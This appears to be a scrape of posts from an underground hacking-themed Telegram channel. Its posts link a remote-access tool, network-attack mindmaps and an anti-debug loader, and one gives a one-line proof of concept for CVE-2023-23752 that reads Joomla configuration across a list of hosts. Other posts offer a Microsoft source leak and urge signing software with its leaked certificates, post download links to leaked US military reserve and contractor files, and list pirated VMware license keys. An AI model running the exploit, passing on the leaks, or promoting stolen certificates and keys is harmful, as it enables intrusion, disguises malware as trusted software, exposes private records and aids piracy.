Cyber0жff666 λ
115 subscribers
167 photos
209 files
522 links
Cyber intelligence corporation.

C, C++, Assembly, UNIX, Malwares, Ransomwares, Information Security, Networks and Anonymity

new group link in: @intell666
Download Telegram
​​Spark

Spark is a free, safe, open-source, web-based, cross-platform and full-featured RAT (Remote Administration Tool) that allow you to control all your devices via browser anywhere.

https://github.com/XZB-1248/Spark

#redteam
🦈 Приручаем акулу. Wireshark Mindmap.

• Многим из Вас знаком Wireshark — анализатор пакетов, программа номер один для сетевого анализа, траблшутинга, разработки программных и коммуникационных протоколов, а также всем, что связано с обучением нетворкингу.

• Для изучения и использования данного инструмента, предлагаю ознакомиться с очень полезной Mindmap, которая поможет сократить время при выполнении определенных задач: https://github.com/Ignitetechnologies/Mindmap

• P.S. Обязательно ознакомься с материалом "Лайфхаки на каждый день" и другой полезной информацией по хештегу #Wireshark.
Microsoft (source code) Leak

Source codes of the following Bing products, Bing Maps and Cortana. There are many digital signatures of Microsoft products in the leak. Many of them have not been recalled. Go ahead and your software will have the same level of trust as the original Microsoft product. Tell me about your successes.

DOWNLOAD!
👍1
1 - Information Gathering
Discover Network Hosts
Enumerate Listening Services
Discover Vulnerabilities


2 - Focused Penetration
Compromise Vulnerable Hosts (level 1)
[Exploit missing software patches]
[Deploy custom executable payloads]
[Acess remote management interfaces - RMI]


3 - Privilege Escalation
Estabilish Persistent Re-entry
Havest User Credentials
Pass Credentials to New Hosts(level 2)
[Identify privileged user accountd]
[Elevate to domain admin]


4 - Documentation
Gather Screenshots
Create Linear Attack Narratives
Create Final Deliverable

Enjoy
@CyberTemple
⭕️CVE-2023-23752
Joomla webservice endpoint access
PoC
httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'
🔞 US military contractor files and Puerto Rican reserve files leak.

Details: The two files are sets of documents regarding the US military reserve in Puerto Rico and of contractors that work with the military. These were both obtained in 2022 and these have been leaked in response to the atrocious acts that US has been involved in all these years without regard for human lives.

➡️Download links(updated V2):
https://anonfiles.com/b29eud70y1/USArmyReservePR.part2_rar

https://anonfiles.com/WdB2t971y6/USArmyReservePR.part1_rar

https://drive.google.com/file/d/1ClMiJBbDrBWJWsXF2edpaq6LA7VCzszt/view?usp=sharing

➡️Backup links:
https://bayfiles.com/b05cw473yb/USArmyReservePR.part1_rar
https://bayfiles.com/d9r9x57eyd/USArmyReservePR.part2_rar
https://upload.st/DdNbw77aye/USArmyReservePR.part1_rar
https://upload.st/ubffx773y5/USArmyReservePR.part2_rar
👏1
⭕️One of the methods of debugger detection used in malware or commercial software is parent process checking. In debugger we can use Anti-Debug plugins, but what about out of debugger ?

⭕️With SB-Loader you can patch process memory or run any process under explorer.exe or any desired process.

Features :
Select the parent process with process name
Select the parent process with process id
Run the child process with process argument
Memory patcher

🌐 Project Link
👍1
𝙊𝙎𝙄𝙉𝙏, 𝙂𝙚𝙤𝙡𝙤𝙘𝙖𝙩𝙞𝙤𝙣 𝙏𝙚𝙘𝙝𝙣𝙞𝙦𝙪𝙚𝙨 𝙖𝙣𝙙 𝙏𝙝𝙧𝙚𝙖𝙩 𝙄𝙣𝙩𝙚𝙡𝙡𝙞𝙜𝙚𝙣𝙘𝙚 𝙈𝙖𝙥𝙥𝙞𝙣𝙜 𝙄𝙣 𝙈𝙚𝙭𝙞𝙘𝙤

Link 🔗:-
https://www.cyberoneintel.com/post/osint-geolocation-techniques-and-threat-intelligence-mapping

Tools 🛠️:-
https://www.cyberoneintel.com/tools
Network Nightmare Mindmap.

It is a mindmap for conducting network attacks. For the most part, it will be useful to pentesters or red team operators.

Traffic Hijacking;
MiTM Attacks;
Dynamic IGP Routing;
Configuration Exfiltration;
DoS;
NAC/802.1X Bypassing;
GRE Pivoting;
Cisco EEM for hiding user;
Authentication Cracking;
Information Gathering;
Cisco Passwords;
VLAN Bypassing.

https://github.com/c4s73r/NetworkNightmare/blob/main/NetworkNightmare_by_Caster.pdf
1
🔑 VMware Workstation Keys 🔑

VMware Workstation 15 Pro:

ZG51K-25FE1-H81ZP-95XGT-WV2C0

VMware Workstation 16 Pro:

6JZPU-P8NYG-11Q12-ZZZ5R-ZQEGZ
ZF3R0-FHED2-M80TY-8QYGC-NPKYF
YF390-0HF8P-M81RQ-2DXQE-M2UT6
ZF71R-DMX85-08DQY-8YMNC-PPHV8
AZ3E8-DCD8J-0842Z-N6NZE-XPKYF
FC11K-00DE0-0800Z-04Z5E-MC8T6

VMware workstation 17 Pro:

MC60H-DWHD5-H80U9-6V85M-8280D
4A4RR-813DK-M81A9-4U35H-06KND
NZ4RR-FTK5H-H81C1-Q30QH-1V2LA
4C21U-2KK9Q-M8130-4V2QH-CF810
4Y09U-AJK97-089Z0-A3054-83KLA